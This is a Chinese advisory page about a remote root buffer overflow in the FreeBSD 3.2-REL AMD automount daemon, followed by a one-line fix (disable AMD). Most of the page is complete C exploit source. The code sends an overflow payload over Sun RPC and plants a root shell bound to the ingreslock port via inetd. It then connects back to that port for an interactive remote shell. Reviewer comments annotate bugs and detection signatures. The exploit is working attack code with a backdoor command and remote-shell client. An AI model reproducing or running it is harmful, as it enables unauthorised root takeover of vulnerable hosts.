FreeBSD AMD远程溢出(old)
涉及程序:
FreeBSD AMD
描述:
FreeBSD 3.2-REL AMD存在溢出允许远程获取root
详细:
下面是这个远程溢出的攻击测试代码，另外还需要一个头文件（amd-incl.h）。
程序只允许用于研究用途,非法使用者后果自负!
研究者请不要随意散播!
请下载代码包: rpc_AMD_FreeBSD3_2REL.tar.gz
/*
* $Id$
*
* fbsd_amd.c
* fbsd_amd.c -- FreeBSD 3.2-REL AMD remote root exploit
*
* Copyright (c) 1999 anathema <anathema@box.co.uk>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include "amd-incl.h"
/*
 * Target-specific constants.  These are hard-wired for the stock FreeBSD
 * 3.2-REL amd binary named in the file header; nothing in this file adapts
 * them at runtime, which is why the banner in main() says the code was
 * "tested against" that single build.
 */
#define ADDR 0xbfbfd2a4 /* FreeBSD 3.2-REL */
#define RETPOS 1005
#define AMD_PROG 300019 /* RPC program number the client in exploit() is created against */
#define AMD_VERS 1
/*
 * Request payload: a run of escaped bytes (not decoded here) followed by a
 * "/bin/sh -c" command string.  The command string is the part that matters
 * for detection: it writes a one-line inetd configuration to /tmp/x that maps
 * the ingreslock service to a root /bin/sh, starts a second inetd from that
 * file, and then removes the file.  shellz() below connects to that service
 * (1524/tcp).
 */
char c0de[] =
"\xeb\x3d\x9a\x24\x24\x24\x24\x07\x24\xc3\x5e\x29\xc0\x89\x46\xbf\x88\x46\xc4"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56\x8d\x5e\x10"
"\x89\x1e\x53\x8d\x5e\x18\x89\x5e\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xc6"
"\xff\xff\xff\xff\xff\xff\xe8\xc6\xff\xff\xff\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x04\x04\x04\x04"
"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/x;"
"/usr/sbin/inetd /tmp/x; /bin/rm -f /tmp/x";
/*
 * Turn a host argument into an IPv4 address in network byte order.
 *
 * Dotted-quad input is accepted directly via inet_addr(); anything else is
 * handed to gethostbyname() and the first returned address is used.
 *
 * Returns 0 when the name cannot be resolved.  Note that 0 is also what a
 * literal "0.0.0.0" yields, and that inet_addr() signals failure with
 * INADDR_NONE (all ones), which collides with "255.255.255.255".
 */
u_long
resolve_host(u_char *host)
{
    struct in_addr addr;

    /* Fast path: the argument is already a numeric address. */
    addr.s_addr = inet_addr(host);
    if (addr.s_addr != -1) {
        return (addr.s_addr);
    }

    /* Otherwise fall back to a name lookup. */
    struct hostent *he = gethostbyname(host);
    if (he == NULL) {
        return ((u_long)0);
    }
    memcpy((char *)&addr.s_addr, he->h_addr, he->h_length);
    return (addr.s_addr);
}
/*
 * Second stage: attach to the listener the payload is expected to have set
 * up on dst_ip, then shuttle bytes between this process's stdin/stderr and
 * that socket until the process is killed.  Never returns.
 *
 * dst_ip is an IPv4 address in network byte order (as produced by
 * resolve_host()).
 *
 * For monitoring purposes the connect() to 1524/tcp below is the
 * network-visible signature of this stage.
 */
void
shellz(u_long dst_ip)
{
struct sockaddr_in sin;
u_char sock_buf[8192];
fd_set fds;
int sock;
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == -1)
{
perror("socket allocation");
exit(-1);
}
/* sin is never zeroed, so sin_zero is left uninitialised. */
sin.sin_family = AF_INET;
sin.sin_port = htons(1524); /* ingreslock */
sin.sin_addr.s_addr = dst_ip;
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
perror("connecting to backdoor");
exit(-1);
}
fprintf(stderr, "\nHost `%s` successfully owned.\n",
inet_ntoa(sin.sin_addr));
/* Relay loop: wait on both stdin (fd 0) and the socket and copy from
 * whichever became readable. */
for (;;)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
/* nfds is a fixed 255 rather than sock + 1, so only descriptors below
 * 255 are examined; the select() result itself is not checked. */
select(255, &fds, NULL, NULL, NULL);
/* Zeroing every round is what supplies the NUL terminator that the "%s"
 * print and the strlen() below depend on; a read() that fills all 8192
 * bytes leaves none. */
memset(sock_buf, 0, sizeof(sock_buf));
if (FD_ISSET(sock, &fds))
{
/* NOTE(review): read()/write() return values are ignored, so a peer that
 * closes the connection (0-byte read) is not detected and the loop keeps
 * spinning. */
read(sock, sock_buf, sizeof(sock_buf));
fprintf(stderr, "%s", sock_buf);
}
if (FD_ISSET(0, &fds))
{
read(0, sock_buf, sizeof(sock_buf));
write(sock, sock_buf, strlen(sock_buf));
}
}
/* NOTREACHED */
}
/*
 * Build the string that exploit() sends as the mount argument.  Layout of
 * the returned bytes, by offset:
 *   [0, RETPOS - strlen(c0de))       0x90 filler
 *   [RETPOS - strlen(c0de), RETPOS)  the c0de bytes
 *   [RETPOS, RETPOS + 4)             ADDR, least-significant byte first
 * The rest of the local buffer stays zero from the {0} initialiser.
 *
 * Returns a heap copy made with strdup(), which stops at the first NUL; the
 * caller (exploit()) never frees it.  strlen(c0de) is recomputed on each of
 * the two lines that use it.
 */
u_char *
overflow_buf(void)
{
u_char buf[2048] = {0};
u_long addr = ADDR;
int ret = RETPOS;
memset(buf, 0x90, ret - strlen(c0de));
memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));
/* Explicit little-endian byte split, independent of host byte order. */
buf[ret++] = (addr & 0xff);
buf[ret++] = (addr >> 8) & 0xff;
buf[ret++] = (addr >> 16) & 0xff;
buf[ret++] = (addr >> 24) & 0xff;
return(strdup(buf));
}
/*
 * First stage: open a TCP Sun-RPC client to program AMD_PROG / version
 * AMD_VERS on dst_ip and issue a single amqproc_mount_1() call whose
 * argument is the string produced by overflow_buf().  After a fixed
 * 2-second pause the client is torn down and control passes to shellz(),
 * so this function does not return normally.
 *
 * amqproc_mount_1() is a client stub supplied by "amd-incl.h" (not shown
 * in this file).  dst_ip is in network byte order.
 */
void
exploit(u_long dst_ip)
{
struct sockaddr_in sin;
CLIENT *clnt;
u_char buf[4096] = {0};
u_char *ptr = buf;
int sock = RPC_ANYSOCK;
/* The strdup()'d string returned by overflow_buf() is copied into buf and
 * never freed. */
strncpy(buf, overflow_buf(), sizeof(buf));
sin.sin_family = AF_INET;
/* A zero port makes clnttcp_create() look the service port up through the
 * target's portmapper. */
sin.sin_port = 0;
sin.sin_addr.s_addr = dst_ip;
clnt = clnttcp_create(&sin, AMD_PROG, AMD_VERS, &sock, 0, 0);
if (!clnt)
{
/* The label says "udp" although the client above is TCP; message text only. */
clnt_pcreateerror("clntudp_create");
exit(-1);
}
fprintf(stderr, "\nIt's time to w8.. \n");
/* The stub's result is discarded; only the side effect on the server is of interest. */
amqproc_mount_1(&ptr, clnt);
sleep(2);
clnt_destroy(clnt);
shellz(dst_ip);
}
/*
 * Print the one-line invocation summary to stderr and terminate the
 * process with status 0.  argv0 is the program name as seen in argv[0].
 */
void
usage(u_char *argv0)
{
    static const char usage_fmt[] = "usage:\t%s dst_host|ip\n";

    (void)fprintf(stderr, usage_fmt, argv0);
    exit(0);
}
/*
 * Entry point.  Usage: <prog> dst_host|ip
 *
 * Prints a banner, resolves argv[1] with resolve_host(), echoes the
 * resolved target and the hard-coded ADDR, then hands off to exploit(),
 * which is not expected to return (it ends in shellz()'s endless relay
 * loop or in an exit()).
 */
int
main(int argc, char **argv)
{
struct in_addr i_addr;
u_long dst_ip = 0;
fprintf(stderr, "AMD exploit for FreeBSD 3.X <anathema@box.co.uk>\n"
"Tested against FreeBSD 3.2-REL stock AMD binary.\n\n");
if (argc != 2)
{
usage(argv[0]);
/* NOTREACHED */
}
/* resolve_host() reports failure as 0; a literal "0.0.0.0" yields the same
 * value and is therefore rejected here as well. */
dst_ip = resolve_host(argv[1]);
if (!dst_ip)
{
fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]);
exit(-1);
}
i_addr.s_addr = dst_ip;
fprintf(stderr, "target : %s\n", inet_ntoa(i_addr));
/* NOTE(review): ADDR is an unsuffixed integer literal, so on LP64 hosts it
 * has type unsigned int while %lx expects unsigned long. */
fprintf(stderr, " addr : 0x%lx\n", ADDR);
exploit (dst_ip);
/* No explicit return; reaching the end of main() yields 0 under C99 rules,
 * although exploit() is not expected to come back here. */
}
/* EOF */
解决办法:
关掉AMD守护程序